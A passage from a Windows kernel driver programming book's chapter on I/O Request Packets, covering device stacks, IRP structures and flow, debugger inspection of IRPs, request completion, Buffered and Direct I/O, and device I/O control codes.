often used with hardware device stacks). Figure 7-1 shows six layers, or six devices. Each of these devices is
represented by a DEVICE_OBJECT structure created by calling the standard IoCreateDevice function.
Chapter 7: The I/O Request Packet
186
Figure 7-2: Layered devices
The different device objects that comprise the device node (devnode) layers are labeled according to their
role in the devnode. These roles are relevant in a hardware-based devnode.
All the device objects in figure 7-2 are just DEVICE_OBJECT structures, each created by a different driver
that is in charge of that layer. More generically, this kind of device node does not have to be related to
hardware-based device drivers.
Here is a quick rundown of the meaning of the labels present in figure 7-2:
• PDO (Physical Device Object) - Despite the name, there is nothing “physical” about it. This device
object is created by a bus driver - the driver that is in charge of the particular bus (e.g. PCI, USB,
etc.). This device object represents the fact that there is some device in that slot on that bus.
• FDO (Functional Device Object) - This device object is created by the “real” driver; that is, the driver
typically provided by the hardware’s vendor that understands the details of the device intimately.
• FiDO (Filter Device Object) - These are optional filter devices created by filter drivers.
The Plug & Play (P&P) manager, in this case, is responsible for loading the appropriate drivers, starting
from the bottom. As an example, suppose the devnode in figure 7-2 represents a set of drivers that manage
Chapter 7: The I/O Request Packet
187
a PCI network card. The sequence of events leading to the creation of this devnode can be summarized as
follows:
1. The PCI bus driver (pci.sys) recognizes the fact that there is something in that particular slot. It
creates a PDO (IoCreateDevice) to represent this fact. The bus driver has no idea whether this a
network card, video card or something else; it only knows there is something there and can extract
basic information from its controller, such as the Vendor ID and Device ID of the device.
2. The PCI bus driver notifies the P&P manager that it has changes on its bus.
3. The P&P manager requests a list of PDOs managed by the bus driver. It receives back a list of PDOs,
in which this new PDO is included.
4. Now the P&P manager’s job is to find and load the proper driver that new PDO. It issues a query to
the bus driver to request the full hardware device ID.
5. With this hardware ID in hand, the P&P manager looks in the Registry at HKLM\System\ Current-
ControlSet\Enum\PCI\(HardwareID). If the driver has been loaded before, it will be registered there,
and the P&P manager will load it. Figure 7-3 shows an example hardware ID in the registry (NVIDIA
display driver).
6. The driver loads and creates the FDO (another call to IoCreateDevice), but adds an additional
call to IoAttachDeviceToDeviceStack, thus attaching itself over the previous layer (typically
the PDO).
We’ll see how to write filter drivers that take advantage of IoAttachDeviceToDeviceStack in
chapter 13.
Chapter 7: The I/O Request Packet
188
Figure 7-3: Hardware ID information
The value Service in figure 7-3 indirectly points to the actual driver at HKLMSystemCutrrent-
ControlSetServices{ServiceName} where all drivers must be registered.
The filter device objects are loaded as well, if they are registered correctly in the Registry. Lower filters
(below the FDO) load in order, from the bottom. Each filter driver loaded creates its own device object and
attached it on top of the previous layer. Upper filters work the same way but are loaded after the FDO. All
this means that with operational P&P devnodes, there are at least two layers - PDO and FDO, but there
could be more if filters are involved. We’ll look at basic filter development for hardware-based drivers in
chapter 13.
Full discussion of Plug & Play and the exact way this kind of devnode is built is beyond the scope of this
book. The previous description is incomplete and glances over some details, but it should give you the
basic idea. Every devnode is built from the bottom up, regardless of whether it is related to hardware or
not.
Lower filters are searched in two locations: the hardware ID key shown in figure 7-3 and in the correspond-
ing class based on the ClassGuid value listed under HKLM\System\CurrentControlSet\Control\Classes.
The value name itself is LowerFilters and is a multiple string value holding service names, pointing to
Chapter 7: The I/O Request Packet
189
the same Services key. Upper filters are searched in a similar manner, but the value name is UpperFilters.
Figure 7-4 shows the registry settings for the DiskDrive class, which has a lower filter and an upper filter.
Figure 7-4: The DiskDrive class key
IRP Flow
Figure 7-2 shows an example devnode, whether related to hardware or not. An IRP is created by one of
the managers in the Executive - for most of our drivers that is the I/O Manager.
The manager creates an IRP with its associated IO_STACK_LOCATIONs - six in the example in figure 7-2.
The manager initializes the main IRP structure and the first I/O stack location only. Then it passes the
IRP’s pointer to the uppermost layer.
A driver receives the IRP in its appropriate dispatch routine. For example, if this is a Read IRP, then the
driver will be called in its IRP_MJ_READ index of its MajorFunction array from its driver object. At
this point, a driver has several options when dealing with IRP:
• Pass the request down - if the driver’s device is not the last device in the devnode, the driver can
pass the request along if it’s not interesting for the driver. This is typically done by a filter driver
that receives a request that it’s not interested in, and in order not to hurt the functionality of the
device (since the request is actually destined for a lower-layer device), the driver can pass it down.
This must be done with two calls:
– Call IoSkipCurrentIrpStackLocation to make sure the next device in line is going to
see the same information given to this device - it should see the same I/O stack location.
– Call IoCallDriver passing the lower device object (which the driver received at the time it
called IoAttachDeviceToDeviceStack) and the IRP.
Before passing the request down, the driver must prepare the next I/O stack location with proper
information. Since the I/O manager only initializes the first I/O stack location, it’s the responsibility of
each driver to initialize the next one. One way to do that is to call IoCopyIrpStackLocationToNext
before calling IoCallDriver. This works, but is a bit wasteful if the driver just wants the lower
Chapter 7: The I/O Request Packet
190
layer to see the same information. Calling IoSkipCurrentIrpStackLocation is an optimization
which decrements the current I/O stack location pointer inside the IRP, which is later incremented
by IoCallDriver, so the next layer sees the same IO_STACK_LOCATION this driver has seen. This
decrement/increment dance is more efficient than making an actual copy.
• Handle the IRP fully - the driver receiving the IRP can just handle the IRP without propagating it
down by eventually calling IoCompleteRequest. Any lower devices will never see the request.
• Do a combination of the above options - the driver can examine the IRP, do something (such as log
the request), and then pass it down. Or it can make some changes to the next I/O stack location, and
then pass the request down.
• Pass the request down (with or without changes) and be notified when the request completes by
a lower layer device - Any layer (except the lowest one) can set up an I/O completion routine
by calling IoSetCompletionRoutine before passing the request down. When one of the lower
layers completes the request, the driver’s completion routine will be called.
• Start some asynchronous IRP handling - the driver may want to handle the request, but if the request
is lengthy (typical of a hardware driver, but also could be the case for a software driver), the driver
may mark the IRP as pending by calling IoMarkIrpPending and return a STATUS_PENDING
from its dispatch routine. Eventually, it will have to complete the IRP.
Once some layer calls IoCompleteRequest, the IRP turns around and starts “bubbling up” towards
the originator of the IRP (typically one of the I/O System Managers). If completion routines have been
registered, they will be invoked in reverse order of registration.
In most drivers in this book, layering will not be considered, since the driver is most likely the single
device in its devnode. The driver will handle the request then and there or handle it asynchronously; it
will not pass it down, as there is no device underneath.
We’ll discuss other aspects of IRP handling in filter drivers, including completion routines, in chapter 13.
IRP and I/O Stack Location
Figure 7-5 shows some of the important fields in an IRP.
Chapter 7: The I/O Request Packet
191
Figure 7-5: Important fields of the IRP structure
Here is a quick rundown of these fields:
• IoStatus - contains the Status (NT_STATUS) of the IRP and an Information field. The
Information field is a polymorphic one, typed as ULONG_PTR (32 or 64-bit integer), but its
meaning depends on the type of IRP. For example, for Read and Write IRPs, its meaning is the
number of bytes transferred in the operation.
• UserBuffer - contains the raw buffer pointer to the user’s buffer for relevant IRPs. Read and
Write IRPs, for instance, store the user’s buffer pointer in this field. In DeviceIoControl IRPs,
this points to the output buffer provided in the request.
• UserEvent - this is a pointer to an event object (KEVENT) that was provided by a client if the
call is asynchronous and such an event was supplied. From user mode, this event can be provided
(with a HANDLE) in the OVERLAPPED structure that is mandatory for invoking I/O operations
asynchronously.
• AssociatedIrp - this union holds three members, only one (at most) of which is valid:
* SystemBuffer - the most often used member. This points to a system-allocated non-paged pool buffer
used for Buffered I/O operations. See the section “Buffered I/O” later in this chapter for the details.
* MasterIrp - A pointer to a “master” IRP, if this IRP is an associated IRP. This idea is supported by the
I/O manager, where one IRP is a “master” that may have several “associated” IRPs. Once all the associated
Chapter 7: The I/O Request Packet
192
IRPs complete, the master IRP is completed automatically. MasterIrp is valid for an associated IRP - it
points to the master IRP.
* IrpCount - for the master IRP itself, this field indicates the number of associated IRPs associated with
this master IRP.
Usage of master and associated IRPs is pretty rare. We will not be using this mechanism in this book.
• Cancel Routine - a pointer to a cancel routine that is invoked (if not NULL) if the driver is asked
to can cel the IRP, such as with the user mode functions CancelIo and CancelIoEx. Software
drivers rarely need cancellation routines, so we will not be using those in most examples.
• MdlAddress - points to an optional Memory Descriptor List (MDL). An MDL is a kernel data
structure that knows how to describe a buffer in RAM. MdlAddress is used primarily with Direct
I/O (see the section “Direct I/O” later in this chapter).
Every IRP is accompanied by one or more IO_STACK_LOCATIONs. Figure 7-6 shows the important fields
in an IO_STACK_LOCATION.
Figure 7-6: Important fields of the IO_STACK_LOCATION structure
Chapter 7: The I/O Request Packet
193
Here’s a rundown of the fields shown in figure 7-6:
• MajorFunction - this is the major function of the IRP (IRP_MJ_CREATE, IRP_MJ_READ, etc.).
This field is sometimes useful if the driver points more than one major function code to the same
handling routine. In that routine, the driver may want to distinguish between the major function
codes using this field.
• MinorFunction - some IRP types have minor functions. These are IRP_MJ_PNP, IRP_MJ_POWER
and IRP_MJ_SYSTEM_CONTROL (WMI). Typical code for these handlers has a switch statement
based on the MinorFunction. We will not be using these types of IRPs in this book, except in the
case of filter drivers for hardware-based devices, which we’ll examine in some detail in chapter 13.
• FileObject - the FILE_OBJECT associated with this IRP. Not needed in most cases, but is
available for dispatch routines that need it.
• DeviceObject - the device object associated with this IRP. Dispatch routines receive a pointer to
this, so typically accessing this field is not required.
• CompletionRoutine - the completion routine that is set for the previous (upper) layer (set with
IoSetCompletionRoutine), if any.
• Context - the argument to pass to the completion routine (if any).
• Parameters - this monster union contains multiple structures, each valid for a particular operation.
For example, in a Read (IRP_MJ_READ) operation, the Parameters.Read structure field should
be used to get more information about the Read operation.
The current I/O stack location obtained with IoGetCurrentIrpStackLocation hosts most of the
parameters of the request in the Parameters union. It’s up to the driver to access the correct structure,
as we’ve already seen in chapter 4 and will see again in this and subsequent chapters.
Viewing IRP Information
While debugging or analyzing kernel dumps, a couple of commands may be useful for searching or
examining IRPs.
The !irpfind command can be used to find IRPs - either all IRPs, or IRPs that meet certain criteria. Using
!irpfind without any arguments searches the non-paged pool(s) for all IRPs. Check out the debugger
documentation on how to specify specific criteria to limit the search. Here’s an example of some output
when searching for all IRPs:
lkd> !irpfind
Unable to get offset of nt!_MI_VISIBLE_STATE.SpecialPool
Unable to get value of nt!_MI_VISIBLE_STATE.SessionSpecialPool
Scanning large pool allocation table for tag 0x3f707249 (Irp?) (ffffbf0a8761000\
0 : ffffbf0a87910000)
Irp
[ Thread ]
irpStack: (Mj,Mn)
DevObj
[Driver\
]
MDL Process
ffffbf0aa795ca30 [ffffbf0a7fcde080] irpStack: ( c, 2)
ffffbf0a74d20050 [ \File\
Chapter 7: The I/O Request Packet
194
System\Ntfs]
ffffbf0a9a8ef010 [ffffbf0a7fcde080] irpStack: ( c, 2)
ffffbf0a74d20050 [ \File\
System\Ntfs]
ffffbf0a8e68ea20 [ffffbf0a7fcde080] irpStack: ( c, 2)
ffffbf0a74d20050 [ \File\
System\Ntfs]
ffffbf0a90deb710 [ffffbf0a808a1080] irpStack: ( c, 2)
ffffbf0a74d20050 [ \File\
System\Ntfs]
ffffbf0a99d1da90 [0000000000000000] Irp is complete (CurrentLocation 10 > Stack\
Count 9)
ffffbf0a74cec940 [0000000000000000] Irp is complete (CurrentLocation 8 > StackC\
ount 7)
ffffbf0aa0640a20 [ffffbf0a7fcde080] irpStack: ( c, 2)
ffffbf0a74d20050 [ \File\
System\Ntfs]
ffffbf0a89acf4e0 [ffffbf0a7fcde080] irpStack: ( c, 2)
ffffbf0a74d20050 [ \File\
System\Ntfs]
ffffbf0a89acfa50 [ffffbf0a7fcde080] irpStack: ( c, 2)
ffffbf0a74d20050 [ \File\
System\Ntfs]
(truncated)
Faced with a specific IRP, the command !irp examines the IRP, providing a nice overview of its data. As
always, the dt command can be used with the nt!_IRP type to look at the entire IRP structure. Here’s
an example of one IRP viewed with !irp:
kd> !irp ffffbf0a8bbada20
Irp is active with 13 stacks 12 is current (= 0xffffbf0a8bbade08)
No Mdl: No System Buffer: Thread ffffbf0a7fcde080:
Irp stack trace.
cmd
flg cl Device
File
Completion-Context
[N/A(0), N/A(0)]
0
0 00000000 00000000 00000000-00000000
Args: 00000000 00000000 00000000 00000000
[N/A(0), N/A(0)]
0
0 00000000 00000000 00000000-00000000
(truncated)
Args: 00000000 00000000 00000000 00000000
[N/A(0), N/A(0)]
0
0 00000000 00000000 00000000-00000000
Args: 00000000 00000000 00000000 00000000
>[IRP_MJ_DIRECTORY_CONTROL(c), N/A(2)]
0 e1 ffffbf0a74d20050 ffffbf0a7f52f790 fffff8015c0b50a0-ffffbf0a91d99010 Su\
Chapter 7: The I/O Request Packet
195
ccess Error Cancel pending
\FileSystem\Ntfs
Args: 00004000 00000051 00000000 00000000
[IRP_MJ_DIRECTORY_CONTROL(c), N/A(2)]
0
0 ffffbf0a60e83dc0 ffffbf0a7f52f790 00000000-00000000
\FileSystem\FltMgr
Args: 00004000 00000051 00000000 00000000
The !irp commands lists the I/O stack locations and the information stored in them. The current I/O
stack location is marked with a > symbol (see the IRP_MJ_DIRECTORY_CONTROL line above).
The details for each IO_STACK_LOCATION are as follows (in order):
• first line:
– Major function code (e.g. IRP_MJ_DEVICE_CONTROL).
– Minor function code.
• second line:
– Flags (mostly unimportant)
– Control flags
– Device object pointer
– File object pointer
– Completion routine (if any)
– Completion context (for the completion routine)
– Success, Error, Cancel indicate the IRP completion cases where the completion routine would
be invoked
– “pending” if the IRP was marked as pending (SL_PENDING_RETURNED flag is set in the
Control flags)
• Driver name for that layer
• “Args” line:
– The value of Parameters.Others.Argument1 in the I/O stack location. Essentially the
first pointer-size member in the Parameters union.
– The value of Parameters.Others.Argument2 in the I/O stack location (the second
pointer-size member in the Parameters union)
– Device I/O control code (if IRP_MJ_DEVICE_CONTROL or IRP_MJ_INTERNAL_DEVICE_-
CONTROL). It’s shown as a DML link that invokes the !ioctldecode command to decode the
control code (more on device I/O control codes later in this chapter). For other major function
codes, shows the third pointer-size member (Parameters.Others.Argument3)
– The forth pointer-size member (Parameters.Others.Argument4)
The !irp command accepts an optional details argument. The default is zero, which provides the output
described above (considered a summary). Specifying 1 provides additional information in a concrete form.
Here is an example for an IRP targeted towards the console driver (you can locate those easily by looking
for cmd.exe processes):
Chapter 7: The I/O Request Packet
196
lkd> !irp ffffdb899e82a6f0 1
Irp is active with 2 stacks 1 is current (= 0xffffdb899e82a7c0)
No Mdl: System buffer=ffffdb89c1c84ac0: Thread ffffdb89b6efa080:
Irp stack tr\
ace.
Flags = 00060030
ThreadListEntry.Flink = ffffdb89b6efa530
ThreadListEntry.Blink = ffffdb89b6efa530
IoStatus.Status = 00000000
IoStatus.Information = 00000000
RequestorMode = 00000001
Cancel = 00
CancelIrql = 0
ApcEnvironment = 00
UserIosb = 73d598f420
UserEvent = 00000000
Overlay.AsynchronousParameters.UserApcRoutine = 00000000
Overlay.AsynchronousParameters.UserApcContext = 00000000
Overlay.AllocationSize = 00000000 - 00000000
CancelRoutine = fffff8026f481730
UserBuffer = 00000000
&Tail.Overlay.DeviceQueueEntry = ffffdb899e82a768
Tail.Overlay.Thread = ffffdb89b6efa080
Tail.Overlay.AuxiliaryBuffer = 00000000
Tail.Overlay.ListEntry.Flink = ffff8006d16437b8
Tail.Overlay.ListEntry.Blink = ffff8006d16437b8
Tail.Overlay.CurrentStackLocation = ffffdb899e82a7c0
Tail.Overlay.OriginalFileObject = ffffdb89c1c0a240
Tail.Apc = 8b8b7240
Tail.CompletionKey = 15f8b8b7240
cmd
flg cl Device
File
Completion-Context
>[N/A(f), N/A(7)]
0
1 00000000 00000000 00000000-00000000
pending
Args: ffff8006d1643790 15f8d92c340 0xa0e666b0 ffffdb899e7a53c0
[IRP_MJ_DEVICE_CONTROL(e), N/A(0)]
5
0 ffffdb89846f9e10 ffffdb89c1c0a240 00000000-00000000
\Driver\condrv
Args: 00000000 00000060 0x500016 00000000
Additionally, specifying detail value of 4 shows Driver Verifier information related to the IRP (if the driver
handling this IRP is under the verifier’s microscope). Driver Verifier will be discussed in chapter 13.
Chapter 7: The I/O Request Packet
197
Dispatch Routines
In chapter 4, we have seen an important aspect of DriverEntry - setting up dispatch routines. These
are the functions connected with major function codes. The MajorFunction field in DRIVER_OBJECT
is the array of function pointers index by the major function code.
All dispatch routines have the same prototype, repeated here for convenience using the DRIVER_DIS-
PATCH typedef from the WDK (somewhat simplified for clarity):
typedef NTSTATUS DRIVER_DISPATCH (
_In_
PDEVICE_OBJECT DeviceObject,
_Inout_ PIRP Irp);
The relevant dispatch routine (based on the major function code) is the first routine in a driver that sees
the request. Normally, it’s called in the requesting thread context, i.e. the thread that called the relevant
API (e.g. ReadFile) in IRQL PASSIVE_LEVEL (0). However, it’s possible that a filter driver sitting on
top of this device sent the request down in a different context - it may be some other thread unrelated
to the original requestor and even in higher IRQL, such as DISPATCH_LEVEL (2). Robust drivers need to
be ready to deal with this kind of situation, even though for software drivers this “inconvenient” context
is rare. We’ll discuss the way to properly deal with this situation in the section “Accessing User Buffers”,
later in this chapter.
The first thing a typical dispatch routine does is check for errors. For example, read and write operations
contain buffers - do these buffers have appropriate size? For DeviceIoControl, there is a control code
in addition to potentially two buffers. The driver needs to make sure the control code is something it
recognizes. If any error is identified, the IRP is typically completed immediately with an appropriate status.
If all checks turn up ok, then the driver can deal with performing the requested operation.
Here is the list of the most common dispatch routines for a software driver:
• IRP_MJ_CREATE - corresponds to a CreateFile call from user mode or ZwCreateFile in kernel
mode. This major function is essentially mandatory, otherwise no client will be able to open a handle
to a device controlled by this driver. Most drivers just complete the IRP with a success status.
• IRP_MJ_CLOSE - the opposite of IRP_MJ_CREATE. Called by CloseHandle from user mode or
ZwClose from kernel mode when the last handle to the file object is about to be closed. Most drivers
just complete the request successfully, but if something meaningful was done in IRP_MJ_CREATE,
this is where it should be undone.
• IRP_MJ_READ - corresponds to a read operation, typically invoked from user mode by ReadFile
or kernel mode with ZwReadFile.
• IRP_MJ_WRITE - corresponds to a write operation, typically invoked from user mode by Write-
File or kernel mode with ZwWriteFile.
• IRP_MJ_DEVICE_CONTROL - corresponds to the DeviceIoControl call from user mode or
ZwDeviceIoControlFile from kernel mode (there are other APIs in the kernel that can generate
IRP_MJ_DEVICE_CONTROL IRPs).
• IRP_MJ_INTERNAL_DEVICE_CONTROL - similar to IRP_MJ_DEVICE_CONTROL, but only avail-
able to kernel callers.
Chapter 7: The I/O Request Packet
198
Completing a Request
Once a driver decides to handle an IRP (meaning it’s not passing down to another driver), it must eventually
complete it. Otherwise, we have a leak on our hands - the requesting thread cannot really terminate and
by extension, its containing process will linger on as well, resulting in a “zombie process”.
Completing a request means calling IoCompleteRequest after setting the request status and extra
information. If the completion is done in the dispatch routine itself (a common case for software drivers),
the routine must return the same status that was placed in the IRP.
The following code snippet shows how to complete a request in a dispatch routine:
NTSTATUS MyDispatchRoutine(PDEVICE_OBJECT, PIRP Irp) {
//...
Irp->IoStatus.Status = STATUS_XXX;
Irp->IoStatus.Information = bytes;
// depends on request type
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_XXX;
}
Since the dispatch routine must return the same status as was placed in the IRP, it’s tempting
to write the last statement like so: return Irp->IoStatus.Status; This, however, will
likely result in a system crash. Can you guess why?
After the IRP is completed, touching any of its members is a bad idea. The IRP has probably
already been freed and you’re touching deallocated memory. It can actually be worse, since
another IRP may have been allocated in its place (this is common), and so the code may return
the status of some random IRP.
The Information field should be zero in case of an error (a failure status). Its exact meaning for a
successful operation depends on the type of IRP.
The IoCompleteRequest API accepts two arguments: the IRP itself and an optional value to temporarily
boost the original thread’s priority (the thread that initiated the request in the first place). In most cases,
for software drivers, the thread in question is the executing thread, so a thread boost is inappropriate. The
value IO_NO_INCREMENT is defined as zero, so no increment in the above code snippet.
However, the driver may choose to give the thread a boost, regardless of whether it’s the calling thread
or not. In this case, the thread’s priority jumps with the given boost, and then it’s allowed to execute one
quantum with that new priority before the priority decreases by one, it can then get another quantum
with the reduced priority, and so on, until its priority returns to its original level. Figure 7-7 illustrates this
scenario.
Chapter 7: The I/O Request Packet
199
Figure 7-7: Thread priority boost and decay
The thread’s priority after the boost can never go above 15. If it’s supposed to, it will be 15. If
the original thread’s priority is above 15 already, boosting has no effect.
Accessing User Buffers
A given dispatch routine is the first to see the IRP. Some dispatch routines, mainly IRP_MJ_READ, IRP_-
MJ_WRITE and IRP_MJ_DEVICE_CONTROL accept buffers provided by a client - in most cases from user
mode. Typically, a dispatch routine is called in IRQL 0 and in the requesting thread context, which means
the buffers pointers provided by user mode are trivially accessible: the IRQL is 0, so page faults are handled
normally, and the thread is the requestor, so the pointers are valid in this process context.
However, there could be issues. As we’ve seen in chapter 6, even in this convenient context (requesting
thread and IRQL 0), it’s possible for another thread in the client’s process to free the passed-in buffer(s),
before the driver gets a chance to examine them, and so cause an access violation. The solution we’ve used
in chapter 6 is to use a __try / __except block to handle any access violation by returning failure to the
client.
In some cases, even that is not enough. For example, if we have some code running at IRQL 2 (such as a
DPC running as a result of timer expiration), we cannot safely access the user’s buffers in this context. In
general, there are two potential issues here:
• IRQL of the calling CPU is 2 (or higher), meaning no page fault handling can occur.
• The thread calling the driver may be some arbitrary thread, and not the original requestor. This
means that the buffer pointer(s) provided are meaningless, since the wrong process address space is
accessible.
Chapter 7: The I/O Request Packet
200
Using exception handling in such a case will not work as expected, because we’ll be accessing some
memory location that is essentially invalid in this random process context. Even if the access succeeds
(because that memory happens to be allocated in this random process and is resident in RAM), you’ll be
accessing random memory, and certainly not the original buffer provided to the client.
All this means that there must be some good way to access the original user’s buffer in such an inconvenient
context. In fact, there are two such ways provided by the I/O manager for this purpose, called Buffered I/O
and Direct I/O. In the next two sections, we’ll see what each of these schemes mean and how to use them.
Some data structures are always safe to access, since they are allocated from non-paged
pool (and are in system space). Common examples are device objects (created with
IoCreateDevice) and IRPs.
Buffered I/O
Buffered I/O is the simplest of the two ways. To get support for Buffered I/O for Read and Write operations,
a flag must be set on the device object like so:
DeviceObject->Flags |= DO_BUFFERED_IO;
// DO = Device Object
DeviceObject is the allocated pointer from a previous call to IoCreateDevice (or IoCreateDe-
viceSecure).
For IRP_MJ_DEVICE_CONTROL buffers, see the section “User Buffers for IRP_MJ_DEVICE_CONTROL”
later in this chapter.
Here are the steps taken by the I/O Manager and the driver when a read or write request arrives:
1. The I/O Manager allocates a buffer from non-paged pool with the same size as the user’s buffer. It
stores the pointer to this new buffer in the AssociatedIrp->SystemBuffer member of the IRP.
(The buffer size can be found in the current I/O stack location’s Parameters.Read.Length or
Parameters.Write.Length.)
2. For a write request, the I/O Manager copies the user’s buffer to the system buffer.
3. Only now the driver’s dispatch routine is called. The driver can use the system buffer pointer directly
without any checks, because the buffer is in system space (its address is absolute - the same from
any process context), and in any IRQL, because the buffer is allocated from non-paged pool, so it
cannot be paged out.
4. Once the driver completes the IRP (IoCompleteRequest), the I/O manager (for read requests)
copies the system buffer back to the user’s buffer (the size of the copy is determined by the
IoStatus.Information field in the IRP set by the driver).
5. Finally, the I/O Manager frees the system buffer.
Chapter 7: The I/O Request Packet
201
You may be wondering how does the I/O Manager copy back the system buffer to the original
user’s buffer from IoCompleteRequest. This function can be called from any thread, in
IRQL <= 2. The way it’s done is by queuing a special kernel APC to the thread that requested
the operation. Once this thread is scheduled for execution, the first thing it does is run this APC
which performs the actual copying. The requesting thread is obviously in the correct process
context, and the IRQL is 1, so page faults can be handled normally.
Figures 7-8a to 7-8e illustrate the steps taken with Buffered I/O.
Figure 7-8a: Buffered I/O: initial state
Chapter 7: The I/O Request Packet
202
Figure 7-8b: Buffered I/O: system buffer allocated
Figure 7-8c: Buffered I/O: driver accesses system buffer
Chapter 7: The I/O Request Packet
203
Figure 7-8d: Buffered I/O: on IRP completion, I/O manager copies buffer back (for read)
Figure 7-8e: Buffered I/O: final state - I/O manager frees system buffer
Buffered I/O has the following characteristics:
Chapter 7: The I/O Request Packet
204
• Easy to use - just specify the flag in the device object, and everything else is taken care of by the
I/O Manager.
• It always involves a copy - which means it’s best used for small buffers (typically up to one page).
Large buffers may be expensive to copy. In this case, the other option, Direct I/O, should be used
instead.
Direct I/O
The purpose of Direct I/O is to allow access to a user’s buffer in any IRQL and any thread but without any
copying going around.
For read and write requests, selecting Direct I/O is done with a different flag of the device object:
DeviceObject->Flags |= DO_DIRECT_IO;
As with Buffered I/O, this selection only affects read and write requests. For DeviceIoControl see the
next section.
Here are the steps involved in handling Direct I/O:
1. The I/O Manager first makes sure the user’s buffer is valid and then pages it into physical memory
(if it wasn’t already there).
2. It then locks the buffer in memory, so it cannot be paged out until further notice. This solves one
of the issues with buffer access - page faults cannot happen, so accessing the buffer in any IRQL is
safe.
3. The I/O Manager builds a Memory Descriptor List (MDL), a data structure that describes a buffer in
physical memory. The address of this data structure is stored in the MdlAddress field of the IRP.
4. At this point, the driver gets the call to its dispatch routine. The user’s buffer, although locked in
RAM, cannot be accessed from an arbitrary thread just yet. When the driver requires access to the
buffer, it must call a function that maps the same user buffer to a system address, which by definition
is valid in any process context. So essentially, we get two mappings to the same memory buffer.
One is from the original address (valid only in the context of the requestor process) and the other
in system space, which is always valid. The API to call is MmGetSystemAddressForMdlSafe,
passing the MDL built by the I/O Manager. The return value is the system address.
5. Once the driver completes the request, the I/O Manager removes the second mapping (to system
space), frees the MDL, and unlocks the user’s buffer, so it can be paged normally just like any other
user-mode memory.
The MDL is in actually a list of MDL structures, each one describing a piece of the buffer that is contigous
in physical memory. Remember, that a buffer that is contigous in virtual memory is not necessary
contigous in physical memory (the smallest piece is a page size). In most case, we don’;’t need to care
about this detail. One case where this matters is in Direct Memory Access (DMA) operations. Fortunately,
this is in the realm of hardware-based drivers.
Chapter 7: The I/O Request Packet
205
Figures 7-9a to 7-9f illustrate the steps taken with Direct I/O.
Figure 7-9a: Direct I/O: initial state
Chapter 7: The I/O Request Packet
206
Figure 7-9b: Direct I/O: I/O manager faults buffer’s pages to RAM and locks them
Figure 7-9c: Direct I/O: the MDL describing the buffer is stored in the IRP
Chapter 7: The I/O Request Packet
207
Figure 7-9d: Direct I/O: the driver double-maps the buffer to a system address
Figure 7-9e: Direct I/O: the driver accesses the buffer using the system address
Chapter 7: The I/O Request Packet
208
Figure 7-9f: Direct I/O: when the IRP is completed, the I/O manager frees the mapping, the MDL and unlocks the buffer
Notice there is no copying at all. The driver just reads/writes to the user’s buffer directly, using the system
address.
Locking the user’s buffer is done with the MmProbeAndLockPages API, fully documented
in the WDK. Unlocking is done with MmUnlockPages, also documented. This means a driver
can use these routines outside the narrow context of Direct I/O.
Calling MmGetSystemAddressForMdlSafe can be done multiple times. The MDL stores a
flag indicating whether the system mapping has already been done. If so, it just returns the
existing pointer.
Here is the prototype of MmGetSystemAddressForMdlSafe:
PVOID MmGetSystemAddressForMdlSafe (
_Inout_ PMDL Mdl,
_In_
ULONG Priority);
The function is implemented inline within the wdm.h header by calling the more generic MmMapLocked-
PagesSpecifyCache function:
Chapter 7: The I/O Request Packet
209
PVOID MmGetSystemAddressForMdlSafe(PMDL Mdl, ULONG Priority) {
if (Mdl->MdlFlags & (MDL_MAPPED_TO_SYSTEM_VA|MDL_SOURCE_IS_NONPAGED_POOL)) {
return Mdl->MappedSystemVa;
} else {
return MmMapLockedPagesSpecifyCache(Mdl, KernelMode, MmCached,
NULL, FALSE, Priority);
}
}
MmGetSystemAddressForMdlSafe accepts the MDL and a page priority (MM_PAGE_PRIORITY enu-
meration). Most drivers specify NormalPagePriority, but there is also LowPagePriority and
HighPagePriority. This priority gives a hint to the system of the importance of the mapping in low
memory conditions. Check the WDK documentation for more information.
If MmGetSystemAddressForMdlSafe fails, it returns NULL. This means the system is out of system
page tables or very low on system page tables (depends on the priority argument above). This should be a
rare occurrence, but still can happen in low memory conditions. A driver must check for this; if NULL is
returned, the driver should complete the IRP with the status STATUS_INSUFFICIENT_RESOURCES.
There is a similar function, called MmGetSystemAddressForMdl, which if it fails, crashes
the system. Do not use this function.
You may be wondering why doesn’t the I/O manager call MmGetSystemAddressForMdlSafe auto-
matically, which would be simple enough to do. This is an optimization, where the driver may not need
to call this function at all if there is any error in the request, so that the mapping doesn’t have to occur
at all.
Drivers that don’t set either of the flags DO_BUFFERED_IO nor DO_DIRECT_IO in the device object
flags implicitly use Neither I/O, which simply means the driver doesn’t get any special help from the I/O
manager, and it’s up to the driver to deal with the user’s buffer.
User Buffers for IRP_MJ_DEVICE_CONTROL
The last two sections discussed Buffered I/O and Direct I/O as they pertain to read and write requests. For
IRP_MJ_DEVICE_CONTROL (and IRP_MJ_INTERNAL_DEVICE_CONTROL), the buffering access method
is supplied on a control code basis. Here is the prototype of the user-mode API DeviceIoControl (it’s
similar with the kernel function ZwDeviceIoControlFile):
Chapter 7: The I/O Request Packet
210
BOOL DeviceIoControl(
HANDLE hDevice,
// handle to device or file
DWORD dwIoControlCode,
// IOCTL code (see <winioctl.h>)
PVOID lpInBuffer,
// input buffer
DWORD nInBufferSize,
// size of input buffer
PVOID lpOutBuffer,
// output buffer
DWORD nOutBufferSize,
// size of output buffer
PDWORD lpdwBytesReturned,
// # of bytes actually returned
LPOVERLAPPED lpOverlapped); // for async. operation
There are three important parameters here: the I/O control code, and optional two buffers designated
“input” and “output”. As it turns out, the way these buffers are accessed depends on the control code,
which is very convenient, because different requests may have different requirements related to accessing
the user’s buffer(s).
The control code defined by a driver must be built with the CTL_CODE macro, defined in the WDK and
user-mode headers, defined like so:
#define CTL_CODE( DeviceType, Function, Method, Access ) ( \
((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method))
The first parameter, DeviceType can be one of a set of constants defined by Microsoft for various known
device types (such as FILE_DEVICE_DISK and FILE_DEVICE_KEYBOARD). For custom devices (like the
ones we are writing), it can be any value, but the documnentation states that the minimum value for
custom codes should be 0x8000.
The second parameter, Function is a running index, that must be different between multiple control
codes defined by the same driver. If all other components of the macro are same (possible), at least the
Function would be a differentating factor. Similarly to device type, the official documentation states that
custom devices should use values starting from 0x800.
The third parameter (Method) is the key to selecting the buffering method for accessing the input and
output buffers provided with DeviceIoControl. Here are the options:
• METHOD_NEITHER - this value means no help is required of the I/O manager, so the driver is left
dealing with the buffers on its own. This could be useful, for instance, if the particular code does
not require any buffer - the control code itself is all the information needed - it’s best to let the I/O
manager know that it does not need to do any additional work.
